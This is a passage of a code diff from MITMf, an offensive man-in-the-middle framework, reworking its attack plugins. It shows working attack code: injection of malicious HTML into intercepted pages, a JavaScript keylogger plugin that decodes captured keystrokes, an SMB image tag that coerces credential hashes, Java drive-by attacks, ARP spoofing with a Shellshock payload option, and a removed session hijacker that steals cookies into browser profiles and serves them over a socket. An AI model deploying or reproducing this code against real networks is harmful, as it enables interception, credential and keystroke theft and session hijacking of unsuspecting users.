self.white_ips = options.white_ips
|
||||
self.match_str = options.match_str
|
||||
self.match_str = "</body>" or options.match_str
|
||||
self.html_payload = options.html_payload
|
||||
self.ctable = {}
|
||||
self.dtable = {}
|
||||
self.count = 0
|
||||
self.mime = "text/html"
|
||||
|
||||
if self.options.preserve_cache:
|
||||
self.implements.remove("handleHeader")
|
||||
self.implements.remove("connectionMade")
|
||||
if not options.preserve_cache:
|
||||
cachekill = CacheKill()
|
||||
cachekill.initialize(options)
|
||||
ProxyPlugins.getInstance().addPlugin(cachekill)
|
||||
|
||||
if options.html_file is not None:
|
||||
self.html_payload += options.html_file.read()
|
||||
|
||||
self.ctable = {}
|
||||
self.dtable = {}
|
||||
self.count = 0
|
||||
self.mime = "text/html"
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
def serverResponse(self, response, request, data):
|
||||
#We throttle to only inject once every two seconds per client
|
||||
#If you have MSF on another host, you may need to check prior to injection
|
||||
#print "http://" + request.client.getRequestHostname() + request.uri
|
||||
ip, hn, mime = self._get_req_info(request)
|
||||
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.proxyip):
|
||||
#print "http://" + response.client.getRequestHostname() + response.uri
|
||||
ip, hn, mime = self._get_req_info(response)
|
||||
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.our_ip):
|
||||
if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
||||
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
||||
self.ctable[ip] = time.time()
|
||||
self.dtable[ip+hn] = True
|
||||
self.count += 1
|
||||
mitmf_logger.info("%s [%s] Injected malicious html" % (ip, hn))
|
||||
|
||||
return {'request': request, 'data': data}
|
||||
mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))
|
||||
|
||||
return {'response': response, 'request':request, 'data': data}
|
||||
|
||||
def _get_payload(self):
|
||||
return self._get_js() + self._get_iframe() + self.html_payload
|
||||
|
@ -116,10 +112,10 @@ class Inject(CacheKill, Plugin):
|
|||
|
||||
return mime.find(self.mime) != -1
|
||||
|
||||
def _get_req_info(self, request):
|
||||
ip = request.client.getClientIP()
|
||||
hn = request.client.getRequestHostname()
|
||||
mime = request.client.headers['Content-Type']
|
||||
def _get_req_info(self, response):
|
||||
ip = response.getClientIP()
|
||||
hn = response.getRequestHostname()
|
||||
mime = response.headers['Content-Type']
|
||||
return (ip, hn, mime)
|
||||
|
||||
def _get_iframe(self):
|
||||
|
@ -154,12 +150,11 @@ class Inject(CacheKill, Plugin):
|
|||
|
||||
return data
|
||||
|
||||
def add_options(self, options):
|
||||
def pluginOptions(self, options):
|
||||
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
|
||||
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
|
||||
options.add_argument("--html-payload", type=str, default="", help="String you would like to inject.")
|
||||
options.add_argument("--html-file", type=argparse.FileType('r'), default=None, help="File containing code you would like to inject.")
|
||||
options.add_argument("--match-str", type=str, default="</body>", help="String you would like to match and place your payload before. (</body> by default)")
|
||||
options.add_argument("--html-payload", type=str, default=None, help="String you would like to inject.")
|
||||
options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. (</body> by default)")
|
||||
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
|
||||
group = options.add_mutually_exclusive_group(required=False)
|
||||
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
|
||||
|
|
|
@ -32,7 +32,7 @@ from plugins.BrowserProfiler import BrowserProfiler
|
|||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class JavaPwn(BrowserProfiler, Plugin):
|
||||
class JavaPwn(Plugin):
|
||||
name = "JavaPwn"
|
||||
optname = "javapwn"
|
||||
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
|
||||
|
|
|
@ -21,25 +21,29 @@ import logging
|
|||
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class jskeylogger(Inject, Plugin):
|
||||
class jskeylogger(Plugin):
|
||||
name = "Javascript Keylogger"
|
||||
optname = "jskeylogger"
|
||||
desc = "Injects a javascript keylogger into clients webpages"
|
||||
implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
|
||||
depends = ["Inject"]
|
||||
version = "0.2"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
Inject.initialize(self, options)
|
||||
self.html_payload = self.msf_keylogger()
|
||||
inject = Inject()
|
||||
inject.initialize(options)
|
||||
inject.html_payload = self.msf_keylogger()
|
||||
ProxyPlugins.getInstance().addPlugin(inject)
|
||||
|
||||
def sendPostData(self, request):
|
||||
def clientRequest(self, request):
|
||||
#Handle the plugin output
|
||||
if 'keylog' in request.uri:
|
||||
request.printPostData = False
|
||||
|
||||
client_ip = request.client.getClientIP()
|
||||
|
||||
raw_keys = request.postData.split("&&")[0]
|
||||
keys = raw_keys.split(",")
|
||||
|
@ -59,17 +63,12 @@ class jskeylogger(Inject, Plugin):
|
|||
try:
|
||||
nice += n.decode('hex')
|
||||
except:
|
||||
mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
|
||||
mitmf_logger.error("{} [{}] Error decoding char: {}".format(client_ip, self.name, n))
|
||||
|
||||
#try:
|
||||
# input_field = input_field.decode('hex')
|
||||
#except:
|
||||
# mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
|
||||
|
||||
mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
|
||||
mitmf_logger.info("{} [{}] Host: {} Field: {} Keys: {}".format(client_ip, self.name, request.headers['host'], input_field, nice))
|
||||
|
||||
def msf_keylogger(self):
|
||||
#Stolen from the Metasploit module http_javascript_keylogger
|
||||
#Stolen from the Metasploit module http_javascript_keylogger, modified to work in Android and IOS
|
||||
|
||||
payload = """<script type="text/javascript">
|
||||
window.onload = function mainfunc(){
|
||||
|
|
|
@ -19,7 +19,9 @@
|
|||
#
|
||||
|
||||
"""
|
||||
|
||||
Plugin by @rubenthijssen
|
||||
|
||||
"""
|
||||
|
||||
import sys
|
||||
|
@ -28,78 +30,51 @@ import time
|
|||
import re
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class Replace(CacheKill, Plugin):
|
||||
class Replace(Plugin):
|
||||
name = "Replace"
|
||||
optname = "replace"
|
||||
desc = "Replace arbitrary content in HTML content"
|
||||
implements = ["handleResponse", "handleHeader", "connectionMade"]
|
||||
depends = ["CacheKill"]
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
version = "0.2"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
|
||||
self.search_str = options.search_str
|
||||
self.replace_str = options.replace_str
|
||||
self.regex_file = options.regex_file
|
||||
|
||||
if (self.search_str is None or self.search_str == "") and self.regex_file is None:
|
||||
sys.exit("[-] Please provide a search string or a regex file")
|
||||
|
||||
self.regexes = []
|
||||
if self.regex_file is not None:
|
||||
for line in self.regex_file:
|
||||
self.regexes.append(line.strip().split("\t"))
|
||||
|
||||
if self.options.keep_cache:
|
||||
self.implements.remove("handleHeader")
|
||||
self.implements.remove("connectionMade")
|
||||
|
||||
self.ctable = {}
|
||||
self.dtable = {}
|
||||
self.mime = "text/html"
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
ip, hn, mime = self._get_req_info(request)
|
||||
def serverResponse(self, response, request, data):
|
||||
ip, hn, mime = self._get_req_info(response)
|
||||
|
||||
if self._should_replace(ip, hn, mime):
|
||||
|
||||
if self.search_str is not None and self.search_str != "":
|
||||
data = data.replace(self.search_str, self.replace_str)
|
||||
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
|
||||
|
||||
# Did the user provide us with a regex file?
|
||||
for regex in self.regexes:
|
||||
try:
|
||||
data = re.sub(regex[0], regex[1], data)
|
||||
for rulename, regexs in self.config['Replace'].iteritems():
|
||||
for regex1,regex2 in regexs.iteritems():
|
||||
if re.search(regex1, data):
|
||||
try:
|
||||
data = re.sub(regex1, regex2, data)
|
||||
|
||||
mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
|
||||
except Exception:
|
||||
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
|
||||
mitmf_logger.info("{} [{}] Host: {} Occurances matching '{}' replaced with '{}' according to rule '{}'".format(ip, self.name, hn, regex1, regex2, rulename))
|
||||
except Exception:
|
||||
mitmf_logger.error("{} [{}] Your provided regex ({}) or replace value ({}) is empty or invalid. Please debug your provided regex(es) in rule '{}'" % (ip, hn, regex1, regex2, rulename))
|
||||
|
||||
self.ctable[ip] = time.time()
|
||||
self.dtable[ip+hn] = True
|
||||
|
||||
return {'request': request, 'data': data}
|
||||
|
||||
return
|
||||
|
||||
def add_options(self, options):
|
||||
options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
|
||||
options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
|
||||
options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
|
||||
options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
def _should_replace(self, ip, hn, mime):
|
||||
return mime.find(self.mime) != -1
|
||||
|
||||
def _get_req_info(self, request):
|
||||
ip = request.client.getClientIP()
|
||||
hn = request.client.getRequestHostname()
|
||||
mime = request.client.headers['Content-Type']
|
||||
def _get_req_info(self, response):
|
||||
ip = response.getClientIP()
|
||||
hn = response.getRequestHostname()
|
||||
mime = response.headers['Content-Type']
|
||||
|
||||
return (ip, hn, mime)
|
||||
|
|
|
@ -18,7 +18,6 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
import threading
|
||||
import sys
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
|
@ -94,7 +93,7 @@ class Responder(Plugin):
|
|||
def pluginReactor(self, strippingFactory):
|
||||
reactor.listenTCP(3141, strippingFactory)
|
||||
|
||||
def add_options(self, options):
|
||||
def pluginOptions(self, options):
|
||||
options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
|
||||
options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Enables answers for netbios wredir suffix queries")
|
||||
options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Enables answers for netbios domain suffix queries")
|
||||
|
|
|
@ -21,20 +21,22 @@
|
|||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
class SMBAuth(Inject, Plugin):
|
||||
class SMBAuth(Plugin):
|
||||
name = "SMBAuth"
|
||||
optname = "smbauth"
|
||||
desc = "Evoke SMB challenge-response auth attempts"
|
||||
depends = ["Inject"]
|
||||
version = "0.1"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
Inject.initialize(self, options)
|
||||
self.target_ip = SystemConfig.getIP(options.interface)
|
||||
|
||||
self.html_payload = self._get_data()
|
||||
|
||||
inject = Inject()
|
||||
inject.initialize(options)
|
||||
inject.html_payload = self._get_data()
|
||||
ProxyPlugins.getInstance().addPlugin(inject)
|
||||
|
||||
def _get_data(self):
|
||||
return '<img src=\"\\\\%s\\image.jpg\">'\
|
||||
|
|
|
@ -1,187 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb
|
||||
import threading
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
import logging
|
||||
import sqlite3
|
||||
import json
|
||||
import socket
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from core.publicsuffix.publicsuffix import PublicSuffixList
|
||||
from urlparse import urlparse
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class SessionHijacker(Plugin):
|
||||
name = "Session Hijacker"
|
||||
optname = "hijack"
|
||||
desc = "Performs session hijacking attacks against clients"
|
||||
implements = ["cleanHeaders"] #["handleHeader"]
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.psl = PublicSuffixList()
|
||||
self.firefox = options.firefox
|
||||
self.mallory = options.mallory
|
||||
self.save_dir = "./logs"
|
||||
self.seen_hosts = {}
|
||||
self.sql_conns = {}
|
||||
self.sessions = []
|
||||
self.html_header="<h2>Cookies sniffed for the following domains\n<hr>\n<br>"
|
||||
|
||||
#Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
|
||||
#SQLite version 3.7.0 or later. You won't be able to read the database files
|
||||
#with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
|
||||
#or is not a database" message.
|
||||
|
||||
sqlv = sqlite3.sqlite_version.split('.')
|
||||
if (sqlv[0] <3 or sqlv[1] < 7):
|
||||
sys.exit("[-] sqlite3 version 3.7 or greater required")
|
||||
|
||||
if not os.path.exists("./logs"):
|
||||
os.makedirs("./logs")
|
||||
|
||||
if self.mallory:
|
||||
t = threading.Thread(name='mallory_server', target=self.mallory_server, args=())
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def cleanHeaders(self, request): # Client => Server
|
||||
headers = request.getAllHeaders().copy()
|
||||
client_ip = request.getClientIP()
|
||||
|
||||
if 'cookie' in headers:
|
||||
|
||||
if self.firefox:
|
||||
url = "http://" + headers['host'] + request.getPathFromUri()
|
||||
for cookie in headers['cookie'].split(';'):
|
||||
eq = cookie.find("=")
|
||||
cname = str(cookie)[0:eq].strip()
|
||||
cvalue = str(cookie)[eq+1:].strip()
|
||||
self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)
|
||||
|
||||
mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)
|
||||
|
||||
if self.mallory:
|
||||
if len(self.sessions) > 0:
|
||||
temp = []
|
||||
for session in self.sessions:
|
||||
temp.append(session[0])
|
||||
if headers['host'] not in temp:
|
||||
self.sessions.append((headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
|
||||
else:
|
||||
self.sessions.append((headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
|
||||
mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
|
||||
|
||||
#def handleHeader(self, request, key, value): # Server => Client
|
||||
# if 'set-cookie' in request.client.headers:
|
||||
# cookie = request.client.headers['set-cookie']
|
||||
# #host = request.client.headers['host'] #wtf????
|
||||
# message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
|
||||
# if self.urlMonitor.isClientLogging() is True:
|
||||
# self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
|
||||
# else:
|
||||
# mitmf_logger.info(message)
|
||||
|
||||
def mallory_server(self):
|
||||
host = ''
|
||||
port = 20666
|
||||
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
server.bind((host,port))
|
||||
server.listen(1)
|
||||
while True:
|
||||
client, addr = server.accept()
|
||||
if addr[0] != "127.0.0.1":
|
||||
client.send("Hacked By China!")
|
||||
client.close()
|
||||
continue
|
||||
request = client.recv(8192)
|
||||
request = request.split('\n')
|
||||
path = request[0].split()[1]
|
||||
client.send("HTTP/1.0 200 OK\r\n")
|
||||
client.send("Content-Type: text/html\r\n\r\n")
|
||||
if path == "/":
|
||||
client.send(json.dumps(self.sessions))
|
||||
client.close()
|
||||
|
||||
def firefoxdb(self, host, cookie_name, cookie_value, url, ip):
|
||||
|
||||
session_dir=self.save_dir + "/" + ip
|
||||
cookie_file=session_dir +'/cookies.sqlite'
|
||||
cookie_file_exists = os.path.exists(cookie_file)
|
||||
|
||||
if (ip not in (self.sql_conns and os.listdir("./logs"))):
|
||||
|
||||
try:
|
||||
if not os.path.exists(session_dir):
|
||||
os.makedirs(session_dir)
|
||||
|
||||
db = sqlite3.connect(cookie_file, isolation_level=None)
|
||||
self.sql_conns[ip] = db.cursor()
|
||||
|
||||
if not cookie_file_exists:
|
||||
self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
|
||||
self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
|
||||
except Exception, e:
|
||||
print str(e)
|
||||
|
||||
scheme = urlparse(url).scheme
|
||||
scheme = (urlparse(url).scheme)
|
||||
basedomain = self.psl.get_public_suffix(host)
|
||||
address = urlparse(url).hostname
|
||||
short_url = scheme + "://"+ address
|
||||
|
||||
log = open(session_dir + '/visited.html','a')
|
||||
if (ip not in self.seen_hosts):
|
||||
self.seen_hosts[ip] = {}
|
||||
log.write(self.html_header)
|
||||
|
||||
if (address not in self.seen_hosts[ip]):
|
||||
self.seen_hosts[ip][address] = 1
|
||||
log.write("\n<br>\n<a href='%s'>%s</a>" %(short_url, address))
|
||||
|
||||
log.close()
|
||||
|
||||
if address == basedomain:
|
||||
address = "." + address
|
||||
|
||||
expire_date = 2000000000 #Year2033
|
||||
now = int(time.time()) - 600
|
||||
self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0))
|
||||
|
||||
def add_options(self, options):
|
||||
options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
|
||||
options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension')
|
||||
|
||||
def finish(self):
|
||||
if self.firefox:
|
||||
print "\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'"
|
|
@ -42,6 +42,7 @@ class Spoof(Plugin):
|
|||
self.dnscfg = self.config['MITMf']['DNS']
|
||||
self.dhcpcfg = self.config['Spoof']['DHCP']
|
||||
self.targets = options.targets
|
||||
self.arpmode = 'rep' or options.arpmode
|
||||
self.manualiptables = options.manualiptables
|
||||
self.mymac = SystemConfig.getMAC(options.interface)
|
||||
self.myip = SystemConfig.getIP(options.interface)
|
||||
|
@ -66,7 +67,7 @@ class Spoof(Plugin):
|
|||
self.protocolInstances.append(arpwatch)
|
||||
|
||||
arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
|
||||
arp.arpmode = options.arpmode
|
||||
arp.arpmode = self.arpmode
|
||||
arp.debug = debug
|
||||
|
||||
self.protocolInstances.append(arp)
|
||||
|
@ -116,7 +117,7 @@ class Spoof(Plugin):
|
|||
for protocol in self.protocolInstances:
|
||||
protocol.start()
|
||||
|
||||
def add_options(self, options):
|
||||
def pluginOptions(self, options):
|
||||
group = options.add_mutually_exclusive_group(required=False)
|
||||
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||
|
@ -125,7 +126,7 @@ class Spoof(Plugin):
|
|||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||
options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default=None, choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
||||
|
||||
def finish(self):
|
||||
for protocol in self.protocolInstances:
|
||||
|
|
|
@ -21,7 +21,7 @@
|
|||
import logging
|
||||
from cStringIO import StringIO
|
||||
from plugins.plugin import Plugin
|
||||
from PIL import Image
|
||||
from PIL import Image, ImageFile
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
|
@ -29,24 +29,22 @@ class Upsidedownternet(Plugin):
|
|||
name = "Upsidedownternet"
|
||||
optname = "upsidedownternet"
|
||||
desc = 'Flips images 180 degrees'
|
||||
implements = ["handleResponse", "handleHeader"]
|
||||
version = "0.1"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
from PIL import Image, ImageFile
|
||||
globals()['Image'] = Image
|
||||
globals()['ImageFile'] = ImageFile
|
||||
self.options = options
|
||||
|
||||
def handleHeader(self, request, key, value):
|
||||
def serverHeaders(self, response, request):
|
||||
'''Kill the image skipping that's in place for speed reasons'''
|
||||
if request.isImageRequest:
|
||||
request.isImageRequest = False
|
||||
request.isImage = True
|
||||
request.imageType = value.split("/")[1].upper()
|
||||
self.imageType = response.headers['content-type'].split('/')[1].upper()
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
def serverResponse(self, response, request, data):
|
||||
try:
|
||||
isImage = getattr(request, 'isImage')
|
||||
except AttributeError:
|
||||
|
@ -54,7 +52,6 @@ class Upsidedownternet(Plugin):
|
|||
|
||||
if isImage:
|
||||
try:
|
||||
image_type = request.imageType
|
||||
#For some reason more images get parsed using the parser
|
||||
#rather than a file...PIL still needs some work I guess
|
||||
p = ImageFile.Parser()
|
||||
|
@ -62,11 +59,11 @@ class Upsidedownternet(Plugin):
|
|||
im = p.close()
|
||||
im = im.transpose(Image.ROTATE_180)
|
||||
output = StringIO()
|
||||
im.save(output, format=image_type)
|
||||
im.save(output, format=self.imageType)
|
||||
data = output.getvalue()
|
||||
output.close()
|
||||
mitmf_logger.info("{} Flipped image".format(request.client.getClientIP()))
|
||||
mitmf_logger.info("{} [Upsidedownternet] Flipped image".format(response.getClientIP()))
|
||||
except Exception as e:
|
||||
mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e))
|
||||
mitmf_logger.info("{} [Upsidedownternet] Error: {}".format(response.getClientIP(), e))
|
||||
|
||||
return {'request': request, 'data': data}
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
|
|
@ -11,7 +11,6 @@ class Plugin(ConfigWatcher, object):
|
|||
name = "Generic plugin"
|
||||
optname = "generic"
|
||||
desc = ""
|
||||
implements = []
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
|
@ -19,31 +18,41 @@ class Plugin(ConfigWatcher, object):
|
|||
self.options = options
|
||||
|
||||
def startThread(self, options):
|
||||
'''Anything that will subclass this function will be a thread'''
|
||||
'''Anything that will subclass this function will be a thread, passed the options namespace'''
|
||||
return
|
||||
|
||||
def add_options(options):
|
||||
'''Add your options to the options parser'''
|
||||
raise NotImplementedError
|
||||
def clientRequest(self, request):
|
||||
'''
|
||||
Handles all outgoing requests, hooks connectionMade()
|
||||
request object has the following attributes:
|
||||
|
||||
def handleHeader(self, request, key, value):
|
||||
'''Handles all response headers'''
|
||||
raise NotImplementedError
|
||||
|
||||
def connectionMade(self, request):
|
||||
'''Handles outgoing request'''
|
||||
raise NotImplementedError
|
||||
|
||||
def pluginReactor(self, strippingFactory):
|
||||
'''This sets up another instance of the reactor on a diffrent port'''
|
||||
request.headers => headers in dict format
|
||||
request.commad => HTTP method
|
||||
request.post => POST data
|
||||
request.uri => full URL
|
||||
request.path => path
|
||||
'''
|
||||
pass
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
def serverHeaders(self, response, request):
|
||||
'''
|
||||
Handles all non-image responses by default. See Upsidedownternet
|
||||
for how to get images
|
||||
Handles all response headers, hooks handleEndHeaders()
|
||||
'''
|
||||
raise NotImplementedError
|
||||
pass
|
||||
|
||||
def serverResponse(self, response, request, data):
|
||||
'''
|
||||
Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
|
||||
'''
|
||||
return {'response': response, 'request':request, 'data': data}
|
||||
|
||||
def pluginOptions(self, options):
|
||||
'''Add your options to the options parser'''
|
||||
pass
|
||||
|
||||
def pluginReactor(self, strippingFactory):
|
||||
'''This sets up another instance of the reactor on a diffrent port, passed the default factory'''
|
||||
pass
|
||||
|
||||
def finish(self):
|
||||
'''This will be called when shutting down'''
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue